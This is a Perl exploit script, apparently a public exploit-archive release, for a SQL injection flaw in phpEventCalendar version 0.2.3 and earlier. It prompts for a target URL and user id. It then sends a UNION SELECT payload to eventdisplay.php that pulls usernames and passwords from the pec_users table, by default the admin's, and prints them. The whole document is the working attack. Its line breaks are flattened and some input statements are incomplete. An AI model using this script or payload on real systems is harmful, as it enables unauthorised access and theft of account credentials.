#!/usr/bin/perl # # Vendor url: www.ikemcg.com # require LWP::UserAgent; print "# # phpEventCalendar <= v0.2.3 SQL Injection Exploit # By Iron - ironwarez.info # Thanks to Silentz for the help :) # Greets to everyone at RootShell Security Group & dHack # # Example target url: http://www.target.com/phpeventcalendar/ Target url?"; chomp($target=); if($target !~ /^http:\/\//) { $target = "http://".$target; } if($target !~ /\/$/) { $target .= "/"; } print "User id to retrieve name/password from? (1 = admin)"; chomp($target_id=); $target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id; $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $response = $ua->get($target); if ($response->is_success) { if($response->content =~ /(.*)<\/span>/i) { ($username,$password) = split(/,/,$1); print "Username: ".$username; print "\nPassword: ".$password; } else { print "\nUnable to retrieve username/password."; } } else { die "Error: ".$response->status_line; }